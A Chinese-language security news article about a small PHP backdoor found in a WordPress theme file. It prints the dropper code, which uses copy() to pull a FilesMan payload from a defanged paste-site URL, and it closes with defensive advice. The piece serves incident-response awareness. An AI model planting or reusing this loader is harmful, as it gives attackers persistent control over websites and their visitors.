後門使用粘貼網址來保存payload
網站後門
後門是攻擊者故意留下用於之後訪問站點的惡意軟體。黑客喜歡在不同的位置注入代碼來增加保持對網站控制權的機會,這樣就可以繼續感染受害者網站了。
今年都在討論解碼含有PHP函數的複雜惡意軟體的新方法。常見的PHP函數有:
·eval, 把一段字元串當作PHP語句來執行
·create_function, 主要用來創建匿名函數
·preg_replace, 正則查找替換函數
·assert, 斷言函數
·base64_decode.
根據最新的網站被黑報告,過去的一年:
·被黑的網站中有71%隱藏有基於PHP的後門。
·這些後門的有效性來源於大多數網站掃描技術的繞過。
不常見的後門
不常見的後門看似合法代碼,大多數的惡意軟體掃描器都無法掃描到。
在應急響應調查中,研究人員發現一個小的、簡單、但有效的後門。
後門的內容會上傳到wp-content/themes/buildup/db.php文件,看起來是這樣的:
if ( @copy("hxxps://paste[.]ee/r/3TwsC/0", "db.php") ) {
echo "Copy_success";
}else{
echo "Copy_failed";
}
?>
這一段代碼會從hxxps://paste[.].ee處下載全部的惡意軟體。
有一款免費的工具會混淆下載的代碼,這樣的工具對惡意軟體開發者來說是很容易的。研究人員還發現一些合法的代碼也會使用這種免費的工具。
混淆的代碼從網站下載惡意軟體
反混淆後就獲得了可讀的代碼:
從中可以看出這是FilesMan後門的一個副本,FilesMan後門是隱藏在文件系統中的後門,會使其在不訪問伺服器或日誌的情況下很難被發現。
如何避免網站後門?
後門很難發現,也很難去除。首先,研究人員建議經常性的監控日誌是否有不常見的行為。其次,為了避免網站被感染,研究人員建議應用文件完整性監控和WAF這樣的安全措施。
※如何搭建一個開源的蜜罐環境
※Windows PureVPN客戶端中的憑據泄漏漏洞
TAG:嘶吼RoarTalk |